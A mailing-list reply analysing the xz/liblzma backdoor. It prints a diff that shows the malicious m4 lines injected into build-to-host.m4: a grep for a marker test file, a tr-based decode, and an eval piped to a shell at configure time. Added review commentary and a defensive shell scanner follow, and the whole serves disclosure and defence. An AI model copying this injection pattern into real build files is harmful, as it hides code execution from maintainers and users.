oss-sec mailing list archives

Re: backdoor in upstream xz/liblzma leading to ssh server compromise


From: Collin Funk <collin.funk1 () gmail com>
Date: Fri, 29 Mar 2024 23:21:19 -0700

I am not subscribed to this list, sorry for the missing Reply-To.

It looks like they copied the build-to-host.m4 file from Gnulib and
made malicious modifications, hoping no one would notice [1].
Hopefully this diff will help lead anyone investigating it in the
correct direction:

$ diff -u m4/build-to-host.m4 $GNULIB_REFDIR/m4/build-to-host.m4 
--- m4/build-to-host.m4 2024-03-29 21:52:50.956049825 -0700
+++ /home/collin/.local/src/gnulib/m4/build-to-host.m4  2024-03-29 22:37:06.424791077 -0700
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 30
+# build-to-host.m4 serial 3
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
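Review bot: the serial line is the point to flag in this hunk: because `---` is the tree's copy and `+++` is the Gnulib reference, every `-` line in this diff is text present only in the shipped file, and the shipped file declares `serial 30` where upstream is at `serial 3`. aclocal compares these serial numbers when deciding whether a local macro file should be replaced by a newer system copy, so an inflated serial keeps a modified file in place across regeneration; a serial that is ahead of upstream should be treated as a red flag, not a cosmetic difference.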
@@ -37,7 +37,6 @@
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
-  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
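Review bot: the `gl_[$1]_prefix` assignment has no counterpart upstream and its placement directly under `dnl Define somedir_c.` hides what it does: `sed "s/.*\.//g"` keeps only the text after the last `.` in `$gl_am_configmake`, that is, the extension of whatever file the earlier recursive grep found. The next hunk then uses that value as a command (`$gl_[$1]_prefix -d`), so a command name is being derived from a file name discovered in the tree; a variable used as a command should never be computed this way, and nothing in the file documents the dependency between the two.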
@@ -59,40 +58,14 @@
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
-  if test "x$gl_am_configmake" != "x"; then
-    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
-  else
-    gl_[$1]_config=''
-  fi
-  _LT_TAGDECL([], [gl_path_map], [2])dnl
-  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
-  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
-  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
-  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
-
-  dnl If the host conversion code has been placed in $gl_config_gt,
-  dnl instead of duplicating it all over again into config.status,
-  dnl then we will have config.status run $gl_config_gt later, so it
-  dnl needs to know what name is stored there:
-  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval 
\$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
-  dnl Search for Automake-defined pkg* macros, in the order
-  dnl listed in the Automake 1.10a+ documentation.
-  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
-  if test -n "$gl_am_configmake"; then
-    HAVE_PKG_CONFIGMAKE=1
-  else
-    HAVE_PKG_CONFIGMAKE=0
-  fi
-
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
-  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
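Review bot: the comment `dnl Search for Automake-defined pkg* macros` does not describe the code below it: `grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/` selects any file in the source tree that ends a line with four `#`, five alphanumerics and four `#`, which has nothing to do with pkg* macros, and the `HAVE_PKG_CONFIGMAKE` it sets is referenced nowhere in the file. The other removed lines turn that file name into executed code: `gl_[$1]_config` pipes the file through `$gl_path_map` (a `tr` that swaps tab with space and `-` with `_`) and then `$gl_[$1]_prefix -d`, the `_LT_TAGDECL` lines carry these variables into the generated output, and `AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null])` hands the result to a shell when config.status runs, with stderr discarded at every stage. None of this exists in Gnulib's file, and a configure-time hook that executes decoded content taken from an arbitrary tree file should fail review outright regardless of what the comment claims.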


It is pretty clear that this line:

   gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`

is checking for and saving 'tests/files/bad-3-corrupt_lzma2.xz'.

I don't think HAVE_PKG_CONFIGMAKE is used anywhere but I could be
missing something.

The '[$1]' in variable names seems to expand to 'locale'. See these
lines from ./configure:

gl_[$1]_prefix
gl_[$1]_config
gl_config_gt="eval \$gl_localedir_config"
gl_localedir_config='`$ECHO "$gl_localedir_config" | $SED "$delay_single_quote_subst"`'
gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"

Hopefully that can help someone who is more versed in Autoconf and m4.
Thanks for the work testing and discovering this.

[1] https://git.savannah.gnu.org/cgit/gnulib.git/tree/m4/build-to-host.m4

Collin
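A defender-side triage check for the two artefacts this diff exposes, as an added example that is not part of Collin's message or of Gnulib: a POSIX sh function (the name `scan_build_to_host` and its messages are my own) that flags a `m4/build-to-host.m4` carrying the injected `gl_am_configmake` search or the `AC_CONFIG_COMMANDS([build-to-host]` hook, and lists every file in an unpacked tree that satisfies the same `#{4}[[:alnum:]]{5}#{4}$` marker regex the injected grep uses, so a tarball can be inspected before `./configure` is ever run.

```shell
#!/bin/sh
# Added example, not code from the original post or from Gnulib.
# Triage an unpacked source tree for the two artefacts visible in the diff:
#   1. m4/build-to-host.m4 carrying the injected gl_am_configmake search or the
#      AC_CONFIG_COMMANDS([build-to-host]) hook (absent from upstream Gnulib);
#   2. any file whose content satisfies the marker regex that injected grep
#      uses (four '#', five alphanumerics, four '#' at end of line).
# Prints one line per finding. Returns 0 when nothing matched, 1 otherwise.
# Function name and message texts are my own choices.

scan_build_to_host() {
    tree=$1
    found=0
    m4file="$tree/m4/build-to-host.m4"
    if [ -f "$m4file" ]; then
        # Show the serial line so an inflated number (30 vs upstream's 3) is visible.
        printf 'info: %s declares "%s"\n' "$m4file" "$(sed -n '1p' "$m4file")"
        # Fixed-string search (-F) so the regex characters inside the injected
        # line are matched literally rather than interpreted.
        if grep -q -F 'gl_am_configmake=`grep -aErls' "$m4file" \
           || grep -q -F 'AC_CONFIG_COMMANDS([build-to-host]' "$m4file"; then
            printf 'SUSPECT m4: %s contains the injected gl_am_configmake logic\n' "$m4file"
            found=1
        fi
    fi
    # Same regex and flags as the injected search (-a: scan binaries as text,
    # -E: extended regex, -r: recurse, -l: list file names, -s: no errors),
    # run here only to show which file(s) that search would have selected.
    markers=$(grep -aErls '#{4}[[:alnum:]]{5}#{4}$' "$tree" 2>/dev/null)
    if [ -n "$markers" ]; then
        printf '%s\n' "$markers" | sed 's/^/SUSPECT marker: /'
        found=1
    fi
    return $found
}

# Usage: scan_build_to_host /path/to/unpacked/tarball
if [ $# -gt 0 ]; then
    scan_build_to_host "$1"
fi
```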
